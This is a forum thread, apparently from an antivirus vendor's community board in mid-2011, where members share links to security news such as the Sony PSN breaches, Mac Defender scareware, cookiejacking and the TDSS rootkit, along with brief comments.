http://www.h-online.com/security/news/item/Another-25-million-Sony-users-compromised-1236397.html
http://www.soe.com/securityupdate/pressrelease.vm
-
Coming soon to a Mac near you: serious malware (http://www.zdnet.com/blog/bott/coming-soon-to-a-mac-near-you-serious-malware/3212?tag=nl.e589)
-
Osama Bin Laden's Death Ups Risk for Cyber Scams
In the day following the big news, Baumgartner said cybercriminals started using top search results related to bin Laden in Google Images to redirect people to pages filled with malware.
http://abcnews.go.com/Technology/osama-bin-ladens-death-leads-cyber-scams-spam/story?id=13513179
-
Not unexpected, as this is the usual jump on whatever news bandwagon happens to be passing and get into the search engine rankings.
What surprises me is how they manage to get so high in the actual search engine page results. Of course they also purchase keyword search result ranking, but google were meant to be cracking down on that little ploy/scam.
-
again:
Osama malware scams spread to Facebook
http://www.theregister.co.uk/2011/05/03/osama_malware_scams/
http://countermeasures.trendmicro.eu/osama-lives-again-on-facebook/
It is also worth noting that this is not the only Osama scam currently spreading on Facebook, I also spotted many iterations of a second attack that uses clickjacking in the form of a bogus CAPTCHA to fool users into posting the bait to their own walls.
(http://countermeasures.trendmicro.eu/wp-content/uploads/2011/05/math-400x320.png)
-
VLC Media Player vulnerable to buffer overflow exploits
http://www.h-online.com/security/news/item/VLC-Media-Player-vulnerable-to-buffer-overflow-exploits-1237404.html
-
Vulnerabilities in Zyxel's ZyWall products
http://www.h-online.com/security/news/item/Vulnerabilities-in-Zyxel-s-ZyWall-products-1237316.html
-
Damn! why whatever I use should get Vulnerabilities? Even I dropped many programs like VLC which often get problem and is possible to replace with more secure programs to -at least- get a 100% rating by secunia for secure browsing. but I cannot replace hardware easily! hope their new firmware will remain safe!
-
LastPass Security Notification
http://blog.lastpass.com/2011/05/lastpass-security-notification.html
We noticed an issue yesterday and wanted to alert you to it. As a precaution, we're also forcing you to change your master password.
-
LastPass Security Notification
http://blog.lastpass.com/2011/05/lastpass-security-notification.html
We noticed an issue yesterday and wanted to alert you to it. As a precaution, we're also forcing you to change your master password.
yeah and now their forums are down, not their main site though.
New blog notification here:
http://blog.lastpass.com/2011/05/lastpass-security-notification.html
-
Osama Bin Laden's Death Ups Risk for Cyber Scams
In the day following the big news, Baumgartner said cybercriminals started using top search results related to bin Laden in Google Images to redirect people to pages filled with malware.
http://abcnews.go.com/Technology/osama-bin-ladens-death-leads-cyber-scams-spam/story?id=13513179
Here's a look at some Malware for the Mac.
http://www.youtube.com/watch?v=L6cvUY4CGp0&feature=feedu
-
LastPass Security Notification
http://blog.lastpass.com/2011/05/lastpass-security-notification.html
We noticed an issue yesterday and wanted to alert you to it. As a precaution, we're also forcing you to change your master password.
yeah and now their forums are down, not their main site though.
New blog notification here:
http://blog.lastpass.com/2011/05/lastpass-security-notification.html
LOL, i kinda cannot log in, it seems they changed my password
-
Coming soon to a Mac near you: serious malware (http://www.zdnet.com/blog/bott/coming-soon-to-a-mac-near-you-serious-malware/3212?tag=nl.e589)
more on MacMalware...
FakeAV for Mac
http://isc.sans.edu/diary/More+on+MAC+OSX+Malware+-+MACDefender+Fake+Antivirus/10813
http://www.macrumors.com/2011/05/02/new-macdefender-malware-threat-for-mac-os-x/
http://www.norman.com/security_center/security_center_archive/2011/cybercriminals_focus_on_new_targets/en-us
-
Nobody Beats Aaron's, Nobody! a fact helped by them pre-installing spyware on their customers laptops?
http://www.consumeraffairs.com/news04/2011/05/suit-aaron-s-rent-to-own-spies-on-customers.html (http://www.consumeraffairs.com/news04/2011/05/suit-aaron-s-rent-to-own-spies-on-customers.html)
If you happen to own a laptop from Aaron's, maybe someone is watching you right now ;)
-
Third attack against Sony planned
http://news.cnet.com/8301-31021_3-20060227-260.html
-
Scammers Swap Google Images for Malware
http://krebsonsecurity.com/2011/05/scammers-swap-google-images-for-malware/
http://isc.sans.edu/diary/More%2Bon%2BGoogle%2Bimage%2Bpoisoning/10822
-
Update for BIND server patches DoS hole
https://www.isc.org/software/bind
https://www.isc.org/CVE-2011-1907
-
Slack Bank Practice Creates Opportunity for Phone Phishing Scams:
http://www.theregister.co.uk/2011/05/05/bank_practices_open_door_to_phone_phishing/ (http://www.theregister.co.uk/2011/05/05/bank_practices_open_door_to_phone_phishing/)
This doesn't have to be from a bank, it can be from any type of business.
-
Unpatched DLL bugs let hackers exploit Windows 7 and IE9, says researcher
http://www.computerworld.com/s/article/9216483/Unpatched_DLL_bugs_let_hackers_exploit_Windows_7_and_IE9_says_researcher
i hope MS nails this before or with the next monthly update
-
Security update for Check Point for SSL-VPN clients
https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk62410
-
i hope MS nails this before or with the next monthly update
No, not now. :-\
https://www.microsoft.com/technet/security/bulletin/ms11-may.mspx
-
Critical hole in the Exim Mail server closed
http://www.h-online.com/security/news/item/Critical-hole-in-the-Exim-Mail-server-closed-1239543.html
-
PlayStation Network & Qriocity services turned off
http://blog.eu.playstation.com/2011/04/23/update-on-playstation-network-qriocity-services/
Update: http://anonops.blogspot.com/2011/04/we-didnt-do-it-sony-incompetent.html
Update: http://blog.eu.playstation.com/2011/04/24/latest-update-for-psnqriocity-services/
Update on PSN Service Outages
http://faq.en.playstation.com/cgi-bin/scee_gb.cfg/php/enduser/std_adp.php?locale=en_GB&p_faqid=5593
Q&A #1 for PlayStation Network and Qriocity Services
http://blog.us.playstation.com/2011/04/27/qa-1-for-playstation-network-and-qriocity-services/
Attack on the PlayStation Network: what customers should now watch out for
http://www.h-online.com/security/news/item/Attack-on-the-PlayStation-Network-what-customers-should-now-watch-out-for-1233905.html
Another 25 million Sony users compromised
http://www.h-online.com/security/news/item/Another-25-million-Sony-users-compromised-1236397.html
http://www.soe.com/securityupdate/pressrelease.vm
Sony delays PSN reopening
http://blog.us.playstation.com/2011/05/06/service-restoration-update/
-
Fake certificate attack targets Facebook users in Syria
http://www.theregister.co.uk/2011/05/06/syria_fake_certificate_facebook_attack/
A man-in-the-middle attack is being run against users of the secure version of Facebook in Syria, the Electronic Frontier Foundation (EFF) warns.
The semi-professional attack against the HTTPS version of the Facebook site relies on a digital certificate unsigned by any Certificate Authority and probable re-routing of traffic by the Syrian Telecom Ministry. The ongoing attack has been detected against multiple Syrian ISPs.
-
Fake certificate attack targets Facebook users in Syria
http://www.theregister.co.uk/2011/05/06/syria_fake_certificate_facebook_attack/
A man-in-the-middle attack is being run against users of the secure version of Facebook in Syria, the Electronic Frontier Foundation (EFF) warns.
The semi-professional attack against the HTTPS version of the Facebook site relies on a digital certificate unsigned by any Certificate Authority and probable re-routing of traffic by the Syrian Telecom Ministry. The ongoing attack has been detected against multiple Syrian ISPs.
Who is the CA (Certificate Authority) behind the htpps of Facebook?
Edited: found "some" answer.
This is very much an amateur attempt at attacking Facebook's HTTPS site. The certificate was not signed by a Certificate Authority that was trusted by users' web browsers. Unfortunately, Certificate Authorities are under the direct or indirect control of numerous governments, and many governments therefore have the capability to perform versions of this attack that do not raise any errors or warnings.
https://www.eff.org/deeplinks/2011/05/syrian-man-middle-against-facebook
-
Hi,
I have the paid versions of both Avast and MalwareBytes on my desktop.
Almost with out exception every time I open my browser and visit a site I get an Malwarebytes error message about being blocked and showing the following in the error message - avastsvc.exe. ???
It makes no difference whether I just open a blank browser or Google or some other site.
These are both great programs - why can't they work together?
It is getting extremely tiresome! :-[
Thanks,
Bob
-
These are both great programs - why can't they work together?
Add one to the exclusion list of the other and vice-versa.
-
Bin Laden Home Videos Feed Google Image Attacks (http://threatpost.com/en_us/blogs/bin-laden-home-videos-feed-google-image-attacks-050911?utm_source=Newsletter_050911&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=)
Skype Planning Patch for Mac OS X Client Flaw (http://threatpost.com/en_us/blogs/skype-planning-patch-mac-os-x-client-flaw-050911?utm_source=Newsletter_050911&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=)
-
Chrome exploit for Windows passes every security hurdle
http://www.h-online.com/security/news/item/Chrome-exploit-for-Windows-passes-every-security-hurdle-1240508.html
-
LastPass Security Notification
http://blog.lastpass.com/2011/05/lastpass-security-notification.html
We noticed an issue yesterday and wanted to alert you to it. As a precaution, we're also forcing you to change your master password.
yeah and now their forums are down, not their main site though.
New blog notification here:
http://blog.lastpass.com/2011/05/lastpass-security-notification.html
Just received the following:
(http://my.jetscreenshot.com/2701/m_20110510-xvrt-80kb.jpg) (http://my.jetscreenshot.com/2701/20110510-xvrt-80kb)
-
According to this notice, the latest version of Chrome has been hacked--http://www.zdnet.com/blog/security/google-chrome-hacked-with-sophisticated-exploit/8626?tag=nl.e589 (http://www.zdnet.com/blog/security/google-chrome-hacked-with-sophisticated-exploit/8626?tag=nl.e589)
-
Facebook Applications Accidentally Leaking Access to Third Parties
http://www.symantec.com/connect/blogs/facebook-applications-accidentally-leaking-access-third-parties
-
Facebook Applications Accidentally Leaking Access to Third Parties
http://www.symantec.com/connect/blogs/facebook-applications-accidentally-leaking-access-third-parties
Precisely why I always stress not using 3rd party apps in Facebook.
-
According to this notice, the latest version of Chrome has been hacked--http://www.zdnet.com/blog/security/google-chrome-hacked-with-sophisticated-exploit/8626?tag=nl.e589 (http://www.zdnet.com/blog/security/google-chrome-hacked-with-sophisticated-exploit/8626?tag=nl.e589)
Maybe this can be related with WebGL Standard (including Firefox, Chrome, Opera, Safari):
Researchers Warn of Security Issues in WebGL Standard (http://threatpost.com/en_us/blogs/researchers-warn-security-issues-webgl-standard-051111?utm_source=Newsletter_051111&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=&CID=)
Four things you should know about LastPass (http://blogs.computerworld.com/18265/four_things_you_should_know_about_lastpass)
-
According to this notice, the latest version of Chrome has been hacked--http://www.zdnet.com/blog/security/google-chrome-hacked-with-sophisticated-exploit/8626?tag=nl.e589 (http://www.zdnet.com/blog/security/google-chrome-hacked-with-sophisticated-exploit/8626?tag=nl.e589)
Maybe this can be related with WebGL Standard (including Firefox, Chrome, Opera, Safari):
Researchers Warn of Security Issues in WebGL Standard (http://threatpost.com/en_us/blogs/researchers-warn-security-issues-webgl-standard-051111?utm_source=Newsletter_051111&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=&CID=)
Four things you should know about LastPass (http://blogs.computerworld.com/18265/four_things_you_should_know_about_lastpass)
When you read the article, you see that what they did was a series of sophisticated exploits that would be highly unlikely to ever really happen.
-
According to this notice, the latest version of Chrome has been hacked--http://www.zdnet.com/blog/security/google-chrome-hacked-with-sophisticated-exploit/8626?tag=nl.e589 (http://www.zdnet.com/blog/security/google-chrome-hacked-with-sophisticated-exploit/8626?tag=nl.e589)
Maybe this can be related with WebGL Standard (including Firefox, Chrome, Opera, Safari):
Researchers Warn of Security Issues in WebGL Standard (http://threatpost.com/en_us/blogs/researchers-warn-security-issues-webgl-standard-051111?utm_source=Newsletter_051111&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=&CID=)
Four things you should know about LastPass (http://blogs.computerworld.com/18265/four_things_you_should_know_about_lastpass)
When you read the article, you see that what they did was a series of sophisticated exploits that would be highly unlikely to ever really happen.
You are right. But, I said a POSSIBLE cause, NOT the real cause. Also, they not specified what security product were installed at the moment of the video, they showed the update Chrome, but not the Windows update, if the firewall was on or off. Personally, the video is incomplete, we can't predict what was the real thing. I only said (the above mentioned) a possible reason. A vulnerable WebGL standard.
-
I don't think it had to do with WebGL but if it did, I'm safe. WebGL is disabled in Chrome for XP.
-
IE9 Safe from WebGL Woes (http://news.softpedia.com/news/IE9-Safe-from-WebGL-Woes-199832.shtml)
browsers supporting WebGL put customers at risk
:-[
“US-CERT is aware of reports indicating that WebGL contains multiple significant security issues. The impact of these issues includes arbitrary code execution, denial of service, and cross-domain attacks. WebGL is a new web standard that is enabled by default in Firefox 4 and Google Chrome and is included in Safari,”
-
ZeuS source code freely available on the net
http://www.h-online.com/security/news/item/ZeuS-source-code-freely-available-on-the-net-1241417.html
http://www.csis.dk/en/csis/blog/3229
-
IE9 Safe from WebGL Woes (http://news.softpedia.com/news/IE9-Safe-from-WebGL-Woes-199832.shtml)
browsers supporting WebGL put customers at risk
:-[
“US-CERT is aware of reports indicating that WebGL contains multiple significant security issues. The impact of these issues includes arbitrary code execution, denial of service, and cross-domain attacks. WebGL is a new web standard that is enabled by default in Firefox 4 and Google Chrome and is included in Safari,”
Chrome on XP is also safe because WebGL is disabled.
-
Google doodle takes you to scareware sites (http://www.h-online.com/security/news/item/Google-doodle-takes-you-to-scareware-sites-1242208.html)
The infected system could no longer be used in any meaningful way.
Hackers versus Apple (http://www.h-online.com/security/features/Hackers-versus-Apple-1202598.html)
However, experience shows me that OS X probably has more bugs than a Windows browser
Ouch! :-[
-
Google doodle takes you to scareware sites (http://www.h-online.com/security/news/item/Google-doodle-takes-you-to-scareware-sites-1242208.html)
Well, lets face it, clicking the doodle only takes you to a google search on that subject. That will invariably include images, and as we all know, the whole google image search thing (especially with certain other people) leads to malware.
That title is a little misleading IMHO...
-
Scams utilizing Google Music beta
http://www.norman.com/security_center/blog/per_olav_forland/146376/en-us
-
Scams utilizing Google Music beta
http://www.norman.com/security_center/blog/per_olav_forland/146376/en-us
As usual, "If it seems to good to be true, it probably is."
If you didn't apply for the invitation at Google and the reply didn't come directly from Google,
then don't go near the invitation.
-
Win7 Machines Harder Hit with Infection Rates Recently:
http://www.theregister.co.uk/2011/05/13/ms_threat_landscape_survey/ (http://www.theregister.co.uk/2011/05/13/ms_threat_landscape_survey/)
- Java-based exploits and phishing on social networks dominate
-
Windows 7 more malware-resistant than XP/Vista
Windows XP SP3 32-bit has an infection rate of 15.9 per thousand systems, while Windows Vista SP2 32-bit has half this infection rate, 7.5 per thousand. Windows 7 32-bit nearly halves this again to 3.8 per thousand, while Windows 7 64-bit managed to get the infection rate per thousand down to 2.5.
http://www.zdnet.com/blog/hardware/windows-7-more-malware-resistant-than-xpvista/12786
-
Win32/Alureon brings back old school virus techniques, enhanced
While working recently on different Win32/Alureon samples, we noticed some behaviour that deviated from what we’ve seen before. A particular set of files was taking longer to exhibit malicious behaviour than others. We started looking for why this was so, and ended up with a blast from the past. This time the malware was using Win32/Crypto-style decryption to elude anti-virus scanners.
Microsoft Malware Protection Center (http://blogs.technet.com/b/mmpc/archive/2011/05/15/win32-alureon-brings-back-old-school-virus-techniques-enhanced.aspx)
[via (http://threatpost.com/en_us/blogs/new-version-alureon-ups-ante-encryption-051611)]
-
Trojan Feigns Failures to Increase Rogue Defragger Sales (http://www.symantec.com/connect/blogs/trojan-feigns-failures-increase-rogue-defragger-sales)
-
Hackers getting smarter
One-in-14 downloads malicious: Microsoft:
http://www.theage.com.au/technology/security/onein14-downloads-malicious-microsoft-20110519-1etrg.html (http://www.theage.com.au/technology/security/onein14-downloads-malicious-microsoft-20110519-1etrg.html)
-
Sony PSN again
http://sony.nyleveia.com/2011/05/17/warning-all-psn-users-your-accounts-are-still-not-safe/
-
Sony PSN again
http://sony.nyleveia.com/2011/05/17/warning-all-psn-users-your-accounts-are-still-not-safe/
Na, not really: http://blog.us.playstation.com/2011/05/18/update-on-psn-password-reset-process/
-
Sony PSN again
http://sony.nyleveia.com/2011/05/17/warning-all-psn-users-your-accounts-are-still-not-safe/
Na, not really: http://blog.us.playstation.com/2011/05/18/update-on-psn-password-reset-process/
Wouldn't feel too safe with Sony... ;)
http://www.f-secure.com/weblog/archives/00002160.html
Basically this means that Sony has been hacked, again.
-
Mac scareware becomes more visible
http://www.h-online.com/security/news/item/Mac-scareware-becomes-more-visible-1246693.html
http://www.bleepingcomputer.com/virus-removal/remove-mac-protector
http://www.bleepingcomputer.com/virus-removal/remove-mac-defender
-
New 64-Bit Rootkit Being Used to Steal Banking Credentials (http://threatpost.com/en_us/blogs/new-64-bit-rootkit-being-used-steal-banking-credentials-052011?utm_source=Newsletter_052011&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=&CID=)
-
Apple's Mac App Store Puts Users At Risk
http://security.thejoshmeister.com/2011/05/apples-mac-app-store-puts-users-at-risk.html
-
Mac scareware becomes more visible
http://www.h-online.com/security/news/item/Mac-scareware-becomes-more-visible-1246693.html
http://www.bleepingcomputer.com/virus-removal/remove-mac-protector
http://www.bleepingcomputer.com/virus-removal/remove-mac-defender
Winwebsec gang responsible for FakeMacdef?
http://blogs.technet.com/b/mmpc/archive/2011/05/17/winwebsec-gang-responsible-for-fakemacdef.aspx
-
LinkedIn SSL Cookie Vulnerability
http://www.wtfuzz.com/blogs/linkedin-ssl-cookie-vulnerability/
-
Kaspersky: Android is the new Windows
http://www.h-online.com/security/news/item/Kaspersky-Android-is-the-new-Windows-1248329.html
http://www.securelist.com/en/analysis/204792176/IT_Threat_Evolution_for_Q1_2011
-
Black Hole Exploit Kit Available for Free
http://threatpost.com/en_us/blogs/black-hole-exploit-kit-available-free-052311
-
New Hack on Comodo Reseller Exposes Private Data:
http://www.theregister.co.uk/2011/05/24/comodo_reseller_hacked/ (http://www.theregister.co.uk/2011/05/24/comodo_reseller_hacked/)
-
New Hack on Comodo Reseller Exposes Private Data:
http://www.theregister.co.uk/2011/05/24/comodo_reseller_hacked/ (http://www.theregister.co.uk/2011/05/24/comodo_reseller_hacked/)
Comodo president and CEO, Melih Abdulhayoglu, said Comodo systems were never compromised. He also said no certificates were issued as a result of the breach, and that the reseller had no access to Comodo databases.
“So as a summary: its an SQL attack (fairly common) on a company in Brazil who sells some of our products.” he wrote in an email. “Nothing to report really.”
-
Apple Plans Update to Address MacDefender Malware (http://threatpost.com/en_us/blogs/apple-plans-update-address-macdefender-malware-052511?utm_source=Newsletter_052511&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=&CID=)
Study: Android App Authentication Bug Affecting 99% of Users (http://threatpost.com/en_us/blogs/study-android-app-authentication-bug-affecting-99-users-052411?utm_source=Newsletter_052511&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=&CID=)
-
Mac scareware becomes more visible
http://www.h-online.com/security/news/item/Mac-scareware-becomes-more-visible-1246693.html
http://www.bleepingcomputer.com/virus-removal/remove-mac-protector
http://www.bleepingcomputer.com/virus-removal/remove-mac-defender
Winwebsec gang responsible for FakeMacdef?
http://blogs.technet.com/b/mmpc/archive/2011/05/17/winwebsec-gang-responsible-for-fakemacdef.aspx
Apple publishes Mac Defender removal details, promises fix
http://www.h-online.com/security/news/item/Apple-publishes-Mac-Defender-removal-details-promises-fix-1250118.html
Mac Defender variant doesn't require admin password
http://blog.intego.com/2011/05/25/intego-security-memo-new-mac-defender-variant-macguard-doesnt-require-password-for-installation/
-
Sony PSN again
http://sony.nyleveia.com/2011/05/17/warning-all-psn-users-your-accounts-are-still-not-safe/
Na, not really: http://blog.us.playstation.com/2011/05/18/update-on-psn-password-reset-process/
Wouldn't feel too safe with Sony... ;)
http://www.f-secure.com/weblog/archives/00002160.html
Basically this means that Sony has been hacked, again.
Attacks on Sony continue
http://www.h-online.com/security/news/item/Attacks-on-Sony-continue-1250130.html
http://www.pcworld.com/article/228597/sony_says_hacker_stole_2000_records_from_canadian_site.html
-
Internet Explorer: cookie theft made easy
http://www.h-online.com/security/news/item/Internet-Explorer-cookie-theft-made-easy-1250938.html
-
Internet Explorer: cookie theft made easy
http://www.h-online.com/security/news/item/Internet-Explorer-cookie-theft-made-easy-1250938.html
Since you can't eat these cookies, what exactly is he going to do with them ???
-
Since you can't eat these cookies, what exactly is he going to do with them ???
Hackers can exploit the flaw to access a data file stored inside the browser known as a "cookie," which holds the login name and password to a web account, Valotta said via email
Once a hacker has that cookie, he or she can use it to access the same site, said Valotta, who calls the technique "cookiejacking."
-
Google’s Chrome Web Store Quietly Removes Nosy Apps that Read Invade Your Privacy:
http://www.theregister.co.uk/2011/05/26/google_web_store_privacy_threats/ (http://www.theregister.co.uk/2011/05/26/google_web_store_privacy_threats/)
-
Student collects 15 million Gmail addresses
http://www.h-online.com/security/news/item/Student-collects-15-million-Gmail-addresses-1251356.html
-
Large RRSIG RRsets and Negative Caching can crash named
http://www.isc.org/software/bind/advisories/cve-2011-1910
-
Allied Telesis divulges secret backdoor
http://www.h-online.com/security/news/item/Allied-Telesis-divulges-secret-backdoor-1251556.html
-
Chrome app security model is broken
http://blog.mobilephonesecurity.org/2011/05/chrome-app-security-model-is-broken.html
http://www.securitynewsdaily.com/data-swiping-super-mario-games-infiltrate-chrome-web-store-0818/
-
Sony PSN again
http://sony.nyleveia.com/2011/05/17/warning-all-psn-users-your-accounts-are-still-not-safe/
Na, not really: http://blog.us.playstation.com/2011/05/18/update-on-psn-password-reset-process/
Wouldn't feel too safe with Sony... ;)
http://www.f-secure.com/weblog/archives/00002160.html
Basically this means that Sony has been hacked, again.
Attacks on Sony continue
http://www.h-online.com/security/news/item/Attacks-on-Sony-continue-1250130.html
http://www.pcworld.com/article/228597/sony_says_hacker_stole_2000_records_from_canadian_site.html
Poor sony :'(
-
Poor sony :'(
Sorry, but are you serious..???
They should have better protected their servers, imo.
-
My avast anti virus when i try automatic updates i get a message saying that it can not connect to server this was 3 days ago its still doing it.then reads a885he.avast.com then (85.10.210.108.8080 to those updates can anyone be of help i tried typing it in google but cant find them????? thanks in advance...
-
My avast anti virus when i try automatic updates i get a message saying that it can not connect to server this was 3 days ago its still doing it.then reads a885he.avast.com then (85.10.210.108.8080 to those updates can anyone be of help i tried typing it in google but cant find them????? thanks in advance...
- Please start a New Topic of your own as this is unrelated to the original subject and will just confuse the topic and we will try to help.
- Go to this link, http://forum.avast.com/index.php?board=2.0 (http://forum.avast.com/index.php?board=2.0). Click the New Topic button (see image, click to expand) at the top of the list and post there.
-
- Please start a New Topic of your own...
Guess he/she did the best possible..!?? ;)
http://forum.avast.com/index.php?topic=78405.msg650914#msg650914
-
Hackers break into Lockheed Martin
http://www.h-online.com/security/news/item/Hackers-break-into-Lockheed-Martin-1251978.html
http://www.reuters.com/article/2011/05/28/usa-defense-hackers-idUSN2717936920110528
http://www.reuters.com/article/2011/05/29/us-usa-defense-hackers-idUSTRE74Q6VY20110529?irpc=932
-
Aussie Banks Cancel Credit Cards Due to Security Breach:
http://www.theregister.co.uk/2011/05/29/aus_banks_cancel_credit/ (http://www.theregister.co.uk/2011/05/29/aus_banks_cancel_credit/)
-
Skype installs third party software against users' wishes
http://www.h-online.com/security/news/item/Skype-installs-third-party-software-against-users-wishes-1252543.html
-
How many viruses are made by anti-virus companies?
http://www.emsisoft.com/en/kb/articles/tec110601/?utm_source=newsletter&utm_medium=newsletter&utm_content=tec110601&utm_campaign=news110525
-
Poor sony :'(
Sorry, but are you serious..???
They should have better protected their servers, imo.
Yes they should,but what can they do against 32402134 hackers who targeting their company ;D,reminds me of 300,the movie. ;D.
-
How many viruses are made by anti-virus companies?
http://www.emsisoft.com/en/kb/articles/tec110601/?utm_source=newsletter&utm_medium=newsletter&utm_content=tec110601&utm_campaign=news110525
Good article. By the end, the argument could be the same as police and bad guys.
-
...but what can they do against 32402134 hackers who targeting their company ;D,reminds me of 300,the movie. ;D.
These were no DoS attacks. ;)
-
Honda Canada loses 283,000+ records, now faces lawsuit
http://nakedsecurity.sophos.com/2011/05/29/honda-canada-loses-283000-records-now-faces-lawsuit/
-
Skype installs third party software against users' wishes
http://www.h-online.com/security/news/item/Skype-installs-third-party-software-against-users-wishes-1252543.html
We have already seen one topic on the forums where this EasyBits Go inclusion caused concerns of malware on a user system.
-
How many viruses are made by anti-virus companies?
http://www.emsisoft.com/en/kb/articles/tec110601/?utm_source=newsletter&utm_medium=newsletter&utm_content=tec110601&utm_campaign=news110525
I think that the article is nothing more than marketing hype, otherwise why is there the dirty big advert showing emsisoft getting 100% in an old MRG test from q3-q4 2010
-
How many viruses are made by anti-virus companies?
http://www.emsisoft.com/en/kb/articles/tec110601/?utm_source=newsletter&utm_medium=newsletter&utm_content=tec110601&utm_campaign=news110525
I would have to say----- none, zip, zero, nada
-
I think that the article is nothing more than marketing hype, otherwise why is there the dirty big advert showing emsisoft getting 100% in an old MRG test from q3-q4 2010
What would you expect they ad in their site? A third party product?
The article is just as informative as any other on avast blog for instance imho ::)
-
All Internet Explorer browser versions allow cookiejacking
>>> http://www.ecommerce-journal.com/news/48203_all-internet-explorer-browser-versions-allow-cookiejacking <<<
-
Mac scareware becomes more visible
http://www.h-online.com/security/news/item/Mac-scareware-becomes-more-visible-1246693.html
http://www.bleepingcomputer.com/virus-removal/remove-mac-protector
http://www.bleepingcomputer.com/virus-removal/remove-mac-defender
Winwebsec gang responsible for FakeMacdef?
http://blogs.technet.com/b/mmpc/archive/2011/05/17/winwebsec-gang-responsible-for-fakemacdef.aspx
Apple publishes Mac Defender removal details, promises fix
http://www.h-online.com/security/news/item/Apple-publishes-Mac-Defender-removal-details-promises-fix-1250118.html
Mac Defender variant doesn't require admin password
http://blog.intego.com/2011/05/25/intego-security-memo-new-mac-defender-variant-macguard-doesnt-require-password-for-installation/
Apple addresses Mac Defender in Snow Leopard security update
http://www.h-online.com/security/news/item/Apple-addresses-Mac-Defender-in-Snow-Leopard-security-update-1253399.html
-
I think that the article is nothing more than marketing hype, otherwise why is there the dirty big advert showing emsisoft getting 100% in an old MRG test from q3-q4 2010
What would you expect they ad in their site? A third party product?
The article is just as informative as any other on avast blog for instance imho ::)
What I would expect is the article without the attempt at the soft sell by including the old test results. Which given the title of the blog, the marketing advert has nothing to do with the actual article.
So it is superfluous to the article, it didn't need the blatant marketing advert to make its point.
I have no problem with blog articles which are informative, just that this one when allied to a totally unconnected set of test results to me just makes it look like that was the whole purpose of the blog.
-
Apple addresses Mac Defender in Snow Leopard security update
http://www.h-online.com/security/news/item/Apple-addresses-Mac-Defender-in-Snow-Leopard-security-update-1253399.html
http://www.zdnet.com/blog/bott/new-apple-antivirus-signatures-bypassed-within-hours-by-malware-authors-update/3396 (http://www.zdnet.com/blog/bott/new-apple-antivirus-signatures-bypassed-within-hours-by-malware-authors-update/3396)
-
Apple addresses Mac Defender in Snow Leopard security update
http://www.h-online.com/security/news/item/Apple-addresses-Mac-Defender-in-Snow-Leopard-security-update-1253399.html
http://www.zdnet.com/blog/bott/new-apple-antivirus-signatures-bypassed-within-hours-by-malware-authors-update/3396 (http://www.zdnet.com/blog/bott/new-apple-antivirus-signatures-bypassed-within-hours-by-malware-authors-update/3396)
Apple's Mac Defender patch is already worthless (http://www.betanews.com/article/Apples-Mac-Defender-patch-is-already-worthless/1306953026?awesm=betane.ws_1B8&utm_content=api&utm_medium=betane.ws-twitter&utm_source=direct-betane.ws)
-
Facebook Attack Spreading both Windows AND Mac malware
http://www.f-secure.com/weblog/archives/00002172.html
There's a significant Facebook malware attack occurring at the moment.
The malware is using the Facebook "Likes" thumbs-up icon, but appears to be spreading via another method. Additional analysis suggests that the malware itself may be injecting a post into the victim's Facebook session.
Try as we might, our test account was not compromised by the attack server's webpage. We are now speculating that the Windows malware is a Koobface like worm with ZeuS like webinject capabilities. Our analysis continues.
-
Sony Pictures Falls Victim to Major Data Breach (http://www.pcworld.com/article/229303/sony_pictures_falls_victim_to_major_data_breach.html#tk.twt_pcw)
-
Attacks target high-profile Gmail accounts
http://www.h-online.com/security/news/item/Attacks-target-high-profile-Gmail-accounts-1254369.html
http://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html
http://contagiodump.blogspot.com/2011/02/targeted-attacks-against-personal.html
-
Sony Attacked Again, Passwords and Other Data Stolen (http://threatpost.com/en_us/blogs/sony-attacked-again-passwords-and-other-data-stolen-060311?utm_source=Newsletter_060311&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=&CID=)
-
Sony Attacked Again, Passwords and Other Data Stolen (http://threatpost.com/en_us/blogs/sony-attacked-again-passwords-and-other-data-stolen-060311?utm_source=Newsletter_060311&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=&CID=)
Ouch! :-X
-
How many viruses are made by anti-virus companies?
http://www.emsisoft.com/en/kb/articles/tec110601/?utm_source=newsletter&utm_medium=newsletter&utm_content=tec110601&utm_campaign=news110525
The blog fails to point out that a large number of new "viruses" are simply the same piece of malware rendered undetectable by being packaged or encrypted in some way.
There was a fuss a few years ago when an anti-virus company started creating new variants in this way and testing its own product against them.
Other AV companies complained that these fake viruses could find their way into AV testing virus collections and thus show them in a poor light for not detecting unreal viruses.
Possibly this story fed the urban myth somehow.
Somebody with a better memory might even remember which company it was...
(It wasn't avast!)
-
TDSS Rootkit boasts new DHCP server
http://www.theregister.co.uk/2011/06/03/tdss_self_propagation_powers/
A new version of the TDSS rootkit, which also goes by the names Alureon and TDL4, is able to infect new machines using two separate methods,
The second method is to spread over local area networks by creating a rogue DHCP server and waiting for attached machines to request an IP address. When the malware finds a request, it responds with a valid address on the LAN and an address to a malicious DNS server under the control of the rootkit authors. The DNS server then redirects the targeted machine to malicious webpages.
“After these manipulations, whenever the user tries to visit any web page, s/he will be redirected to the malicious server and prompted to update his/her web browser,” Golovanov wrote. “The user will not be able to visit websites until sh/he agrees to install an 'update.'”
Late last year, TDSS acquired the ability to infect 64-bit versions of Microsoft Windows by bypassing the OS's kernel mode code signing policy. Researchers at security firm Prevx have said it's the most advanced rootkit ever seen in the wild. It is used as a backdoor to install and update keyloggers and other types of malware on infected machines, and once installed it's undetectable by most antimalware programs.
-
Absolute Snowage:A concise history of recent Sony hacks
http://attrition.org/security/rants/sony_aka_sownage.html
-
Acer inadvertently releases 40,000 customer details
http://www.h-online.com/security/news/item/Acer-inadvertently-releases-40-000-customer-details-1255998.html
-
RSA finally comes clean: SecurID is compromised
http://arstechnica.com/security/news/2011/06/rsa-finally-comes-clean-securid-is-compromised.ars
http://www.rsa.com/node.aspx?id=3891
-
Allied Telesis divulges secret backdoor
http://www.h-online.com/security/news/item/Allied-Telesis-divulges-secret-backdoor-1251556.html
